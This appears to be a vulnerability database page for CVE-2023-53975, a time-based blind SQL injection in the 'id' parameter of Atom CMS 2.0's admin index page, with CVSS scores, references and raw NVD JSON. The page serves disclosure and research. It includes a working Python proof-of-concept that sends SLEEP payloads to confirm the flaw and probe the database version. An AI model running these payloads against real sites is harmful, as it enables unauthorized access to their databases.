CVE-2023-53975

Description

Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' parameter of the admin index page to execute time-based blind SQL injection attacks.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* - VULNERABLE

Atom CMS 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# CVE-2023-53975 PoC - Time-based Blind SQL Injection
# Target: Atom CMS 2.0 admin/index.php
# Author: VulnCheck

target_url = "http://target.com/admin/index.php"

def sql_injection_test(payload):
    """Send SQL injection payload and measure response time"""
    params = {"id": payload}
    start_time = time.time()
    try:
        response = requests.get(target_url, params=params, timeout=30)
        elapsed = time.time() - start_time
        return elapsed, response.status_code
    except requests.exceptions.Timeout:
        return 30, 200
    except Exception as e:
        print(f"Error: {e}")
        return 0, 0

def extract_data():
    """Extract database version using time-based blind SQL injection"""
    # Test for vulnerability - if SLEEP(5) causes 5 second delay, vulnerability exists
    test_payload = "1 AND (SELECT * FROM (SELECT SLEEP(5))test)"
    print(f"[*] Testing for SQL injection vulnerability...")
    elapsed, status = sql_injection_test(test_payload)
    
    if elapsed >= 5:
        print(f"[+] Vulnerability confirmed! Response time: {elapsed:.2f}s")
    else:
        print(f"[-] Vulnerability not detected")
        return
    
    # Extract database version
    db_version_payload = "1 AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END)"
    print(f"[*] Extracting database version...")
    elapsed, _ = sql_injection_test(db_version_payload)
    
    if elapsed >= 5:
        print(f"[+] Database version starts with '5'")
    else:
        print(f"[+] Database version does not start with '5'")

if __name__ == "__main__":
    print("CVE-2023-53975 Atom CMS SQL Injection PoC")
    print("=" * 50)
    extract_data()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53975
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53975
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53975/
[4] VulDB https://vuldb.com/cve/CVE-2023-53975
[5] https://github.com/thedigicraft/Atom.CMS
[6] https://www.exploit-db.com/exploits/51086
[7] https://www.vulncheck.com/advisories/atom-cms-unauthenticated-sql-injection-via-admin-index-page

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53975", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:02.837", "lastModified": "2026-01-05T14:15:52.800", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' parameter of the admin index page to execute time-based blind SQL injection attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7"}]}]}], "references": [{"url": "https://github.com/thedigicraft/Atom.CMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51086", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/atom-cms-unauthenticated-sql-injection-via-admin-index-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}